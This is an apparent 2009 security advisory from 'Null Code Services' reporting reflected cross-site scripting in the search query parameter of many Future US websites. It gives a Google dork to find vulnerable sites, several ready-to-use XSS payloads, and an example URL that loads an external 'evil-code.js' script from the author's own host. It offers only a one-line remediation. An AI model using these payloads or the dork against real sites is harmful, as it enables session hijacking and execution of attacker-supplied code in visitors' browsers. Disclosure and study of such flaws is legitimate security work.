NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+                 Copyright  2008   - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution   +
+===================================================================================================================+


Author(s): Ivan Sanchez 

Product: Copyright 2008 Future US 



http://www.futureus-inc.com/
http://www.dailyradar.com/

Date: 16/01/2009


A lot domains are affected:
---------------------------

MovieBlips - Your daily movie news
ShowHype - Biggest stories, best fans
TVBlips - For TV aficionados only
42Blips - For science fiction fans
ComicsBlips - Excelsior! Comics news galore!
TotalFilm - Welcome to the movies!
BallHype - Best stories, biggest fans
ActionSportsBlips - Surf, Skate, Ski, Snowboard
BikeRadar - The world is for riding
MMABlips - News to fight for
RacingBlips - News built for speed
CyclingNews - The world centre of cycling
WallStreetBlips - Show me the money
BeltwayBlips - All politics, all the time
EarthBlips - Re-imagine the planet


much more......

Exploited  from querystring or put into the texbox some evil xss-code or external java code , and then you can see the querystring :-
or directly you put the evil code on the querystring .



GOOGLE DORKS:
------------

intext:"Copyright 2008 Future US"



Parameter Affected:
-------------------

query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E

query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60

query="></a><script>alert(1);</script>



Example url:
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E


Remediation: Validate the Input. 
------------





                          NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+===================================================================================================================+
+                 Copyright  2008   - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution  +
+===================================================================================================================+